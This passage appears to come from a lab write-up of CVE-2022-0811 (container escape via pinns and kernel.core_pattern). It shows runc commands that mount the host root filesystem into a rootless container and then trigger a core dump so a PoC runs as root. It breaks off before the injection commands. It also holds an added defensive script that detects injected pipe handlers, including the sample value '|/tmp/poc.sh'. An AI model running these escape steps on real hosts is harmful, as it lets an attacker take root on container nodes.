Reading about the exploit, the steps are: (1) create a pod/container, (2) use pinns to set the vulnerable kernel.core_pattern sysctl, and (3) trigger a core dump and then reap the rewards. More information here: CVE-2022-0811
Create a container using kubectl, minikube, docker or runc.
```
## Create location for runc filesystem
ethan@vessel:/$ mkdir /tmp/pthree
ethan@vessel:/$ mkdir /tmp/pthree/rootfs

## Create runc configuration
ethan@vessel:/tmp/pthree$ runc spec --rootless

## Add following data under 'mounts' section of config.json
{
  "type": "bind",
  "source": "/",
  "destination": "/",
  "options": ["rbind", "rw", "rprivate"]
},

## Start runc
ethan@vessel:/tmp/pthree$ runc run privesc
root@runc:/# hostname
runc
```
Open a second terminal and write a simple PoC script to be executed.
Verify that netns and utsns are created in /tmp/pthree from the container:
```
# ls -al /tmp/pthree
total 24
drwxrwxr-x  5 root   root    4096 Sep  2 09:07 .
drwxrwxrwt 17 nobody nogroup 4096 Sep  2 09:03 ..
-rw-rw-r--  1 root   root    2893 Sep  2 08:59 config.json
drwxr-xr-x  2 nobody root    4096 Sep  2 09:07 netns
drwxrwxr-x  2 root   root    4096 Sep  2 08:58 rootfs
drwxr-xr-x  2 nobody root    4096 Sep  2 09:07 utsns
```
In the first terminal (the runc container), trigger a core dump to run the script:
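The outcome of step (2) above is a kernel.core_pattern that pipes every crash into an attacker-chosen program. The following is an added node-side check (not part of the original write-up) that flags such a value; the allowed handler paths and the sample values are assumptions/constructed for illustration.

```shell
#!/bin/sh
# Added example: audit kernel.core_pattern for a pipe handler that is not a
# known core-dump collector. A value starting with '|' makes the kernel run
# that program (as root, in the host namespaces) on every crash, which is the
# primitive the pinns injection described above abuses.

# Handlers normally expected on a node (assumption: adjust for your distro).
ALLOWED_HANDLERS="/usr/lib/systemd/systemd-coredump /lib/systemd/systemd-coredump /usr/share/apport/apport"

# Returns 0 (suspicious) when the value pipes to an unexpected program,
# 1 when it is a plain file pattern or an allowed handler.
core_pattern_is_suspicious() {
    pattern=$1
    case "$pattern" in
        '|'*) ;;          # pipe handler, keep checking
        *) return 1 ;;    # plain file pattern, e.g. "core" or "/var/crash/core.%e"
    esac
    handler=${pattern#?}        # drop the leading '|'
    handler=${handler%% *}      # drop %-arguments, keep only the program path
    for ok in $ALLOWED_HANDLERS; do
        [ "$handler" = "$ok" ] && return 1
    done
    return 0
}

# Reads the live value on this host and prints a verdict; returns 0 when suspicious.
check_live_core_pattern() {
    live=$(cat /proc/sys/kernel/core_pattern 2>/dev/null) || return 1
    if core_pattern_is_suspicious "$live"; then
        echo "SUSPICIOUS core_pattern: $live"
        return 0
    fi
    echo "core_pattern looks normal: $live"
    return 1
}

# Constructed sample values for a stand-alone run (not taken from the write-up).
SAFE_DEFAULT="core"
SAFE_SYSTEMD="|/usr/lib/systemd/systemd-coredump %P %u %g %s %t %c %h"
INJECTED="|/tmp/poc.sh"

for p in "$SAFE_DEFAULT" "$SAFE_SYSTEMD" "$INJECTED"; do
    if core_pattern_is_suspicious "$p"; then
        echo "suspicious: $p"
    else
        echo "ok: $p"
    fi
done
```

Run check_live_core_pattern from a node-level job or a sysctl monitor; a non-allowlisted pipe handler is worth an alert regardless of how it got there.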